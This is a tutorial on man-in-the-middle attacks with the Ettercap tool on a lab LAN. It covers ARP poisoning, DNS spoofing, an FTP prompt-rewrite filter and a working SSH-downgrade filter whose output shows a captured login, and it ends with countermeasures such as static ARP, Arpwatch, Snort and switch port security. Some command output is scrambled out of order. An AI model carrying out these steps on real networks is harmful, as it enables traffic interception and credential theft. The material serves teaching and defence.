Ettercap is a tool made by Alberto Ornaghi (ALoR) and Marco Valleri (NaGA) and is basically a suite for man in the middle attacks on a LAN. For those who do not like the Command ike Interface (CLI), it is provided with an easy graphical interface. Ettercap is able to perform attacks against the ARP protocol by positioning itself as "man in the middle" and, once positioned as this, it is able to: - infect, replace, delete data in a connection - discover passwords for protocols such as FTP, HTTP, POP, SSH1, etc ... - provide fake SSL certificates in HTTPS sections to the victims. - etc ... Plugins are also available for attacks such as DNS spoofing. What is a "man in the middle" attack? This is an attack where a pirate put its machine in the logical way between two machines speaking together as shown in the picture below. Once in this position, the pirate can launch a lot of different very dangerous attacks because he/she is in the way between to two normal machines. There are several kinds of attacks to become "man in the middle", we will see in this tutorial attacks based on the ARP protocol. The ARP protocol is a layer 3 protocol used to translate IP addresses (ex: to physical network card addresses or MAC addresses (ex:0fe1.2ab6.2398). When a device tries to access a network resource, it will first send requests to other devices asking for the MAC address associated with the IP it wants to reach. The caller will keep the IP - MAC association in its cache, the ARP cache, to speed up new connections to the same IP address. The attack comes when a machine asks the other ones to find the MAC address associated with an IP address. The pirate will answer to the caller with fake packets saying that the IP addressis associated to its own MAC address and in this way, will "short-cut" the real IP - MACassociation answer coming from another host. This attack is referred as ARP poisoning or ARP spoofing and is possible only if the pirate and the victims are inside the same broadcast domain which is defined on the host by an IP address and a Subnet mask, for example: In our tutorial, we will use the case study below where a machine with IP reaches internet resources from a local network. After the ARP poisoning attack, The Ettercap machine with IP is set as "man in the middle".

Please note the following things about the Ettercap machine behaviour:


Every time Ettercap starts, it disables IP forwarding in the kernel and begins to forward packets itself. It can slow down the network performances between the two hosts because of the packets' machine process time. Ettercap needs root privileges to open the Link Layer sockets. After the initialization phase, the root privileges are not needed anymore, so Ettercap drops them to UID = 65535 (nobody). Since Ettercap has to write (create) log files, it must be executed in a directory with the right permissions. The goal of our tutorial is to provide warning about the danger of "man in the middle" attacks by ARP spoofing. In the ARP poisoning tutorial, we will explain how to configure the Ettercap machine as "man in the middle", then, in the filtering tutorial, we will show you some attacks. Finally, some countermeasures are given to fight against these damned ARP poisoning attacks.

An interview about the Ettercap authors can be found on the newsforge website. It is slightly out of date (2004) but remains interesting.

In this first tutorial, we will place our Ettercap machine as "man in the middle" after an ARP spoofing attack. The network scenario diagram is available in the Ettercap introduction page. The first thing to do is to set an IP address on your Ettercap machine in the same IP subnet than the machine you want to poison. For our tutorial the IP address is used. See the networking tutorial for detailed explanations about how to set an IP address on your Linux box. As a reminder, Ettercap will need root access to be launched then it will be supported by the 'nobody' user.





Open Ettercap in graphical mode

#ettercap -G

Select the sniff mode

Select the machines to poison . See the MAC & IP addresses of the hosts inside your subnet.Sniff -> Unified sniffing Scan for host inside your subnet Hosts -> Scan for hosts The network range scanned will be determined by the IP settings of the interface you have just chosen in the previous step.

168.We chose to ARP poison only the windows machine Highlight the line containing 192.168. Check your targets Start the ARP poisoning Mitm -> Arp poisoning . Highlight the line containing 192.1 and click on the "target 1" button.2 and the router 192. If you do not select any machines as target. all the machine inside the subnet will be ARP poisoned.2 and click on the "target 2" button.168.1.1.

2 is at 11:22:33:44:55:66 . Tell 192.1. start the sniffer to collect statistics.1.1 (Router) 11:22:33:44:11:11 192. No 1 2 3 4 Source 11:22:33:44:55:66 11:22:33:44:11:11 11:22:33:44:11:11 11:22:33:44:55:66 Destination 11:22:33:44:11:11 11:22:33:44:55:66 11:22:33:44:55:66 11:22:33:44:11:11 Prot ARP ARP ARP ARP Info who has 192. we can compare the ARP traffic before and after the poisoning: As a reminder: (See the network diagram) 192.168. the router and the Windows machine send an ARP broadcast to find the MAC address of the other.1. with the help of Wireshark.2 (Windows) 11:22:33:44:55:66 192.1? Tell is at 11:22:33:44:11:11 who has 192.Start the sniffer Finally.168.1 Start -> Start sniffing Top of the page ARP TRAFFIC: On the Windows machine.2 192.168.100 (Pirate) 11:22:33:44:99:99 Before the poisoning Before being able to communicate together.1.168.1.

100 11-22-33-44-99-99 dynamic Interface�: -------------------- .0x2 Internet Address Physical Address Type 192. Let's see if we successfully poisoned the router and windows machine ARP table: -------------------- Windows machine -------------------- Launch a command line interface window as follow: Start -> Run -> cmd C:\Documents and Settings\administrator>arp -a Interface�: 192. No Source 1 11:22:33:44:11:11 2 11:22:33:44:55:66 3 11:22:33:44:99:99 4 11:22:33:44:99:99 Top of the page Destination 11:22:33:44:55:66 11:22:33:44:11:11 11:22:33:44:55:66 11:22:33:44:55:66 Prot ARP ARP ARP ARP Info who has 192.0x2 Internet Address Physical Address Type 192.168.2? Tell 192. The difference between the two steps comes from the fact that there is no request coming from Windows (192.2 --.1.100 -------------------- #arp -a ? (192.2) at 11:22:33:44:55:66 [ether] on eth0 -------------------Router is at 11:22:33:44:99:99 192.1.2) to find the MAC address associated to the router (192.1. This means that the packets between the Windows machine and the router will transitthrough the Ettercap machine. 11-22-33-44-99-99 dynamic -------------------Linux machine 192.1.1.After the poisoning The router ARP broadcast request is answered by the Windows machine similarly than in the previous capture.2 --. is at 11:22:33:44:55:66 we see that the Ettercap Linux machine poisoned their ARP table and replaced the router or Windows machine MAC addresses by its own MAC address.168.1 is associated to his own MAC address (11:22:33:44:99:99) instead of the router MAC address (11:22:33:44:11:11).1 11-22-33-44-11-11 dynamic 192.168.1 is at 11:22:33:44:99:99 ARP TABLES: If we look at the router and Windows machine ARP table. at 11:22:33:44:11:11 [ether] on eth0 ? (192.1 192.1.1 11-22-33-44-99-99 dynamic because the poisoner continuously sends ARP packets telling the Windows machine that

9999 ARPA FastEthernet0/0 Internet 192.1.9999 ARPA FastEthernet0/0 Protocol Address Age (min) Hardware Addr Type interface Internet 192.168.2 194 1122.MAC address correspondences. better.168.2 194 1122. you can either wait some minutes.3344. After the attack. or.3344.3344. it will "re-arp" the victims. If the cache still contains poisoned IP . clear the ARP cache.5566 ARPA FastEthernet0/0 Internet 192. use the following command to display the ARP table: >get arp On a Vyatta router: >show arp Top of the page STOPPING THE ARP SPOOFING: Ettercap is pretty effective. In other words the victims ARP cache will again contain correct entries .9999 ARPA FastEthernet0/0 If you have a Netscreen (Juniper) device.1.168.>show arp Protocol Address Age (min) Hardware Addr Type interface Internet 192.3344.1. On a Microsoft machine: C:\Documents and Settings\admin>arp -d * On an Ubuntu or Debian Linux: #arp -d ip_address On a Cisco router: #clear arp-cache .168.100 128 1122.100 128 1122. which is the time needed for the entry ARP cache to refresh itself.1.

org in your web browser.196.CONCLUSION After this tutorial. When you access your favourite web site with your browser. Let's proceed with the DNS spoofing attack.linux.2 in our case study) will first ask the DNS server for the IP addressmatching your URL and then the browser will display the web page.dns In the file you can find an explanation about its configuration. in other words to modify or filter the packets coming from or going to the A 198. The network scenario diagram is available in the Ettercap introduction page.dns in the /usr/share/ettercap/ directory. #vim /usr/share/ettercap/etter. the victim ARP cache has been changed to force theconnections from the Windows machine to go trough the Ettercap machine to reach the desired destination. Remember that you need to follow the ARP poisoning tutorial before doing the steps below. His/Her fake web server will have exactly the same interface than the real bank web site.dns file. The first thing to do is to set the configuration file called etter. 1. you need to activate the dns_spoof plugin in the Ettercap graphical interface.linux1. the ARP table of the router and the Windows machine are poisoned: The Linux machine is now "in the middle".56 *.linux. To launch attacks. we are now ready to perform "man in the middle" attacks. Plugins -> Manage the plugins . To launch attacks. linux1. when the DNS request is PTR 198. the DNSspoofing where the pirate answers DNS requests at the place of the DNS server. Here is the content of our etter.56 www.182. the pirate will wait for you to enter your credentials on his website to capture them. The consequences will be that you have the feeling to reach the desired web site but this will be in fact the pirate's website because of the different IP address.182. To start the DNS spoofing. go on with the Ettercap filter tutorial.linux. the spoofer answers at the place of the DNS server and provides another IP address. So.56 It means that when you open www. your machine (it has an IP address of A 198. you will see the content of the www. With DNS spoofing. The attack can very dangerous when the pirate spoofs important websites such as your bankwebsite. Top of the page FILTER – MITM After the ARP poisoning tutorial.196. FILTERS We will use here the Ettercap plugin called dns_spoof to test a very famous website. As the trap is set. you can either use an Ettercap plugin or load a filter created by yourself. PLUGINS PLUGINS 2.

.dns file and not the real IP address matching the www. This will tag the line with a address. You can see that the content of the page opened is the one that matches the IP address youadded in the etter.Click on the dns_spoof line to activate the in a web browser. Then enter www.linux1.

To stop the DNS spoofing: .

d/dns-clean start" To see your DNS cache: C:\Documents and Settings\administrator>ipconfig /displaydns If you want to change the default DNS cache time. This is because of the DNS cache on our client machine 192. Windows keeps a DNS entry for 300 seconds or 5 minutes in its address in your web browser still displays the content of the web site. By default. you have to modify an entry in the Windows registry. So either you wait quietly for 5 minutes or. Be careful when playing with the registry.linux1. . you can see that the www. Start -> Run -> arborescence below: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ Click on "NegativeCacheTime" in the right panel: click on the "Decimal" button and finally enter your new value for the DNS cache time.2. you flush or clear the DNS cache with the following command: Launch a command line interface window as follow: Start -> Run -> cmd C:\Documents and Settings\administrator>ipconfig /flushdns On an Ubuntu machine use the following command: "/etc/init. an incorrect configuration can damage your system and prevent it from rebooting. better.linux.Start -> Stop sniffing Although we stopped the attack.1.

Below is ourconfiguration file called test_filter in the /usr/share/ettercap directory. #etterfilter etter_filter -o etter_filter_compil This will create a compiled file called etter_filter_comp. a configuration file must be compiled before being able to be used as a filter. We will study two examples based on Ettercap filters. FTP prompt change 2.src == 21 && search(DATA.."TeddyBearFTPD). Load the filter in Ettercap: Filters -> Load a filter. } Then you need to compile the file with etterfilter because Ettercap can only load compiled files. To create a filter. "ProFTPD")) { replace("ProFTPD".Top of the page FILTERS The filters allow you to change the content of packets. # replace the FTP prompt if (tcp. You can find some predefined examples in the /usr/share/ettercap/ directory. SSH downgrade attack 1. 1. FTP Prompt change: We chose in our simple example to change the prompt of a FTP connection.

The principle is to downgrade a protocol version by changing data inside packets.4" an IP address. follow thearp poisoning SSH Downgrade attack: A particularly crafty attack called "the downgrade attack" can be used once in "the man in the middle" position.51 The server supports only SSH1 In our] User (xyz. Tests are performed before and after the Ettercap filtering. it's time to test a FTP connection with our client machine 192.2. 220 "TeddyBear FTPD the server is configured to support both SSH1 and SSH2 and the client is set to use SSH2 and SSH1 but SSH2 as a preference.0a Server ("TeddyBear FTPD) [1. to another version known to be vulnerable.ssh-1.ssh-1.xx The server supports only SSH2 . (Of course.4] User (xyz. 220 "ProFTPD 1.Now.) C:\Documents and Settings\Administrator>ftp www. Suppose the server is configured for SSHv1 and SSHv2.3.Principle ---------------SSH is the most famous example of a downgrade attack where the attacker forces the client and the server to use the insecure SSH1 C:\Documents and Settings\Administrator>ftp www.0a Server ("ProFTPD) [ Top of the page Filter menu 2. you must be set as "man in the middle".ssh-2. ---------------. The server answers either with: .99 The server supports SSH1 and SSH2 .com Connected to xyz. If it's not already the The client sends a request to establish a SSH link to the server and asks it for the version it supports. "xyz" is the website name and "1.1. the hacker will change the answer by .com Connected to xyz.3.

99" string to "1. To activate SSH1.Case Study Installation ---------------a. Server installation: #apt-get install openssh-server By default. you have first to open the /etc/ssh/sshd_config file and update the line beginning with "Protocol": #vim /etc/ssh/sshd_config Protocol 1. c. a. SSH client: Putty on Windows. The client who thinks to use the secure SSH2 protocol will login with SSH1 and the password will be immediately captured by the hacker because of the SSH1 weak password authentication mechanism.modifying the "1.2 . SSH Server: OpenSSH on Linux b. Hacker machine: Ettercap.51" to indicate to the client that the server supports only SSH1 and thus forces the client to open a SSH1 link. ---------------. only SSH2 is enabled on the OpenSSH server.

Keep the SSH default Putty configuration. Putty is a well known open source SSH client for windows. We can check it with the following command: #telnet server_ip_address 22 Trying server_ip_address. Escape character is '^]'. SSH-1.99" response. SSH1 and SSH2 are accepted but SSH2 preferred. Client installation: Download the Putty client..d/ssh restart * Restarting OpenBSD Secure Shell server sshd The SSH server is now configured to accept SSH1 and SSH2 and thus provides a "ssh-1.1 b. restart the server: #/etc/init.6p1 Debian-5ubuntu0.. c. #ssh-keygen -t rsa1 -f /etc/ssh/ssh_host_key -N "" Add the key path into the sshd_config file: HostKey /etc/ssh/ssh_host_key Finally.99-OpenSSH_4. Could not load host key. Connected to server_ip_address.You then need to create a SSH1 key pair otherwise you will have the following error after the SSH server reboot: Disabling protocol version 1. Ettercap installation: .

00") ) { msg("[SSH Filter] Server supports only SSH version 2\n").data. Our laboratory is now operational. "SSH-2. Filters -> Load a filter.99". } } } } } We just need to compile the file to create the filter.51") ) { msg("[SSH Filter] SSH downgraded from version 2 to 1\n"). #cat /usr/share/ettercap/etter. "SSH-1. } else { if ( search(DATA.. } else { if ( search(DATA.51") ) { msg("[SSH Filter] Server already supports only version 1\n").src == 22) { if ( replace(" #etterfilter etter_filter_ssh -o etter_filter_ssh_co We are now ready to load the filter. "SSH-1.Follow the Ettercap installation tutorial to install Ettercap and the ARP poisoning tutorial to set our machine as "Man in the Middle". .Launch the SSH downgrade attack ---------------Ettercap offers a predefined configuration file for the SSH downgrade attack. we can launch the SSH downgrade attack: ---------------. We can check the content of the file but nothing has to be modified.filter. The file is /usr/share/ettercap/etter_filter_ssh.ssh if (ip.proto == TCP) { if (tcp..

Select the compiled file. We are ready to open an SSH link from the client. . The filter is now loaded.

We can test opening an SSH link from the Putty client. Open Putty. Click on the "Open" button to connect to the SSH server.68 in our example) and check the "SSH" radio button.The client. .1.168. the hacker and the server machines are now configured correctly. click on "Session". then enter the SSH server IP address (192. on the left.

1. The server (192.168. Downgraded the SSH version: [SSH Filter] SSH downgraded from version 2 to 1 2. 3.132) meaning it supports SSH1 and SSH2. The attack works fine! As shown.1. (Click to enlarge) 1.99" answer to the client (192.99" server answer was changed to "1.1. 2. The client establishes an SSH1 link because the "1.68) sends a "1.It's time to see if everything is working fine and check on the hacker machine if we catch the SSH1 password. Encrypted SSH1 packets .168.51" by the hacker.168.68:22 -> USER:guillfab PASS:T0rduT1m We can observe a Wireshark capture from the SSH server during the SSH link establishment. Captured the SSH1 credentials: SSH : 192. Ettercap has: 1.

Escape character is '^]'.6p1 Debian-5ubuntu0.1 The value in red must not be under 2. SSH client: Force the SSH2 protocol on the client. only SSHv2 is enabled on the OpenSSH server while it is frequent to see SSHv1 and SSHv2 enabled on the clients such as Putty.d/ssh restart".0. SSH-2. On Putty. .Countermeasures ---------------How to avoid SSH downgrade attacks ? SSH1 must NEVER be used on a SSH server and SSH2 forced on the client.0-OpenSSH_4. #vim /etc/ssh/sshd_config Protocol 2 If you make a change. click on "Connection" then "SSH". By default. Then to be sure your server really supports only SSH2. check the "2only" radio button. Finally. Connected to server_ip_address. do the following command: #telnet server_ip_address 22 Trying server_ip_address.---------------... Let's see how we can secure the SSH client and server: SSH server: Open the /etc/ssh/sshd_config file and check that only the SSH2 protocol is enabled. restart the server with "#/etc/init. in the left panel.

we propose here some ways to protect your machines against these evil spoofers. PORT SECURITY 4. Internet Address Physical Address Type 192. Despite all. try always not to use the default settings.1 11-22-33-44-11-11 static . COUNTERMEASURES Fighting effectively against ARP poisoning with efficiency is not an easy task because the ARP protocol provides no possibilities to establish the authenticity of the source of incoming packets.1 11-22-33-44-11-11 See your ARP cache table: C:\Documents and Settings\administrator>arp -a Interface : 192.2 --.168. STATIC ARP Static ARPing means that you manually configure IP to MAC mappings.1. STATIC ARP 2. CONCLUSION 1.Top of the page Filter menu As a general security rule. Windows Machine C:\Documents and Settings\administrator>arp -s 192.168. SURVEILLANCE TOOLS 3.1. but to force the security level as high as possible both on a server AND its clients.

The configuration is stored in the /etc/arpwatch.2 1122.1 ether 11:22:33:44:11:11 CM Cisco router Iface eth0 router#configure terminal router(config)#arp 192. SURVEILLANCE TOOLS Arpwatch Arpwatch is a tool to monitor the ARP activity on a network and particularly when a change occurrs in the MAC address .IP address associations. #apt-get install ettercap-gtk Launch Ettercap in graphical mode.1..168.This will not prevent other types of ARP attacks such as port stealing. Arpwatch sends its logs in the /var/log/syslog file. For this reason. .100 11-22-33-44-99-99 dynamic Linux machine #arp -s 192.5566 ARPA The creation of static IP .MAC address mappings will prevent ARP poisoning but has two big disadvantages: .192.This will generate a lot of extra work for the administrator and is not applicable in an environment where the users have to move with their laptops.1 11:22:33:44:11:11 See your ARP cache table: #arp Address HWtype HWaddress Flags Mask 192.3344. it can be helpful to detect ARP attacks such as ARP spoofing and can alert the administrator by mail in case ofsuspicious ARP activities (referred to as a flip-flop in Arpwatch).168.1.1.conf file.168. #ettercap -G Sniff -> Unified sniffing. Ettercap Install Ettercap in graphical mode. you can use the "tail /var/log/syslog" command to check the logs in real time.168. #apt-get install arpwatch By default.1.. Top of the page 2. .

Plugins -> Manage the plugins Click on the arp_corp plugin to activate it. Start -> Start Sniffing Snort IDS A Intrusion Detection System such as the Snort IDS can detect ARP abnormal activities andsend a .

3344. and in case a machine is not authorized. Below an example with a Cisco switch where its first port (FastEthernet 0/1) is configured as port-security. If the switch port seee another MAC address on its first port it will immediately it shutdown. the switch can take actions such as alerting the administrator with a SNMP trap or shutting down the faulty port immediately. PORT SECURITY Port-security is a security functionality available on some high-end switches.5566:1 Security Violation Count : 0 Switch#show port-security address Secure Mac Address Table ---------------------------------------------------------------------------Vlan Mac Address Type Ports Remaining Age (mins) ---. we plug a device with MAC address 1122. It will allow only devices with certain MAC addresses to connect to the switch ports.3344.mail to inform the administrator. The switch port will accept only one unique MAC address and this MAC address will be the first seen by the switch port (sticky keyword).-----------------------------1 1122.5566 on the FastEthernet 0/1 port. Switch# configure terminal Switch(config)# interface FastEthernet 0/1 Switch(config-if)# switchport port-security mac-address sticky Switch(config-if)# switchport port-security maximum 1 Switch(config-if)# switchport port-security violation shutdown After the switch configuration. Top of the page 3.3344. which will accept no other MAC address.5566 SecureSticky Fa0/1 ---------------------------------------------------------------------------Total Addresses in System (excluding one mac per port) : 0 Max Addresses limit in System (excluding one mac per port) : 6272 . Switch# show port-security Secure Port MaxSecureAddr CurrentAddr SecurityViolation Security Action (Count) (Count) (Count) --------------------------------------------------------------------------Fa1/0/1 1 1 0 Shutdown --------------------------------------------------------------------------Total Addresses in System (excluding one mac per port) : 0 Max Addresses limit in System (excluding one mac per port) : 6272 Switch# show port-security interface FastEthernet 0/1 Port Security : Enabled Port Status : Secure-up Violation Mode : Shutdown Aging Time : 0 mins Aging Type : Absolute SecureStatic Address Aging : Disabled Maximum MAC Addresses : 1 Total MAC Addresses : 1 Configured MAC Addresses : 0 Sticky MAC Addresses : 1 Last Source Address:Vlan : 1122.

Switch# show port-security interface FastEthernet 0/1 Port Security : Enabled Port Status : Secure-down Violation Mode : Shutdown Aging Time : 0 mins Aging Type : Absolute SecureStatic Address Aging : Disabled Maximum MAC Addresses : 1 Total MAC Addresses : 1 Configured MAC Addresses : 0 Sticky MAC Addresses : 1 Last Source Address:Vlan : 1122.9999).Network restriction with port security or even with the 802.We unplug our current device (MAC: 1122.-----------.---Fa0/1 err-disabled 1 auto auto 10/100BaseTX If you want to reactivate the port in the err-disabled state.9999 on port FastEthernet0/1.-------. putting Fa0/1 in err-disable state 00:06:28 %PORT_SECURITY-2-PSECURE_VIOLATION: Security violation occurred. .3344.9999:1 Security Violation Count : 0 Switch#show logging 00:06:28: %PM-4-ERR_DISABLE: psecure-violation error detected on Fa0/1.-----.1x protocol where a machine is authorized on the network only if it is accepted by an authentication server such as a RADIUS. . . As seen below. 00:06:29: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1. use the following commands: Switch# configure terminal Switch(config)# interface FastEthernet 0/1 Switch(config-if)# shutdown Switch(config-if)# no shutdown The port-security activation will not prevent ARP spoofing but the possibility for the pirate to get connected to the network.------.3344. CONCLUSION There is no miracle solution to fight against ARP spoofing but the suggestions below provide significant help by either preventing the pirate from connecting to the network or by checking your network.5566) and plug another device (MAC: 1122. caused by MAC address 1122.-----------------. changed state to down Switch#show interfaces status | include 0/1 Port Name Status Vlan Duplex Speed Type ------.3344. changed state to down 00:06:30: %LINK-3-UPDOWN: Interface FastEthernet0/1. the switch will shutdown its first port and put it in the err-disabled status.Network surveillance with tools such as IDS.3344. 4.

Sign up to vote on this title
UsefulNot useful